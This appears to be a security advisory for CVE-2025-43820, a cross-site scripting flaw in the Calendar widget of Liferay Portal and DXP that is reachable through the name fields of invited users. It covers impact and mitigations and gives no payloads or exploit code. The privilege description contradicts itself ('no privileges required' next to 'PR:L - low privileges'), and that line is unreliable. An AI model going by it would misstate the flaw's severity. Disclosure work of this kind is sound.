CVE-2025-43820 is a medium-severity cross-site scripting (XSS) vulnerability affecting multiple versions of the Liferay Portal, specifically versions 7.4.3.35 through 7.4.3.110, various 2023 Q3 and Q4 releases of Liferay DXP, and certain 7.3 and 7.4 update releases. The vulnerability resides in the Calendar widget's user invitation functionality, where remote attackers can inject arbitrary web scripts or HTML by crafting malicious payloads that exploit insufficient input sanitization in the First Name, Middle text, or Last Name fields of invited users. This vulnerability is categorized under CWE-79, indicating improper neutralization of input during web page generation, which can lead to script injection. The CVSS 4.0 base score of 4.8 reflects a medium severity, with the vector indicating network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:L - low privileges), user interaction required (UI:A), and limited impacts on confidentiality, integrity, and availability. Exploitation requires at least low privileges and user interaction, such as a user viewing a maliciously crafted event invitation or calendar entry. No known exploits are currently reported in the wild, and no official patches are linked yet. The vulnerability could allow attackers to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, credential theft, or unauthorized actions within the portal environment. Given that Liferay Portal is widely used for enterprise content management and collaboration, this vulnerability poses a risk to organizations relying on these versions for internal or external communications and scheduling.

For European organizations using affected Liferay Portal versions, this vulnerability could lead to targeted attacks exploiting the Calendar widget to execute malicious scripts within users' browsers. This could compromise user sessions, leak sensitive information, or facilitate further attacks such as phishing or privilege escalation within the portal. Since Liferay is often used in corporate intranets, government portals, and public-facing websites, the impact ranges from data confidentiality breaches to disruption of business processes. The requirement for user interaction and low privileges reduces the likelihood of widespread automated exploitation but does not eliminate risk, especially in environments with high user collaboration and frequent event invitations. The vulnerability could be leveraged by attackers to gain footholds in organizational networks or to conduct espionage, particularly in sectors like finance, government, and critical infrastructure where Liferay is deployed. Additionally, the cross-site scripting flaw could be chained with other vulnerabilities to escalate impact. The medium CVSS score reflects moderate risk but should not be underestimated given the potential for targeted social engineering attacks.

Organizations should immediately audit their Liferay Portal deployments to identify affected versions and restrict access to the Calendar widget where feasible. Until official patches are released, implement strict input validation and output encoding on user-supplied fields, especially the First Name, Middle text, and Last Name fields in the Calendar invitation functionality. Employ web application firewalls (WAFs) with custom rules to detect and block typical XSS payloads targeting these fields. Educate users to be cautious when interacting with calendar invitations and event notifications, especially those from unknown or unexpected sources. Monitor logs for unusual activity related to calendar invitations and user input fields. Consider disabling or limiting the use of the Calendar widget for external users or untrusted accounts. Once patches become available, prioritize timely deployment. Additionally, review and enhance Content Security Policy (CSP) headers to restrict script execution contexts and reduce the impact of potential XSS attacks. Regularly update and patch all components of the Liferay environment to minimize exposure to similar vulnerabilities.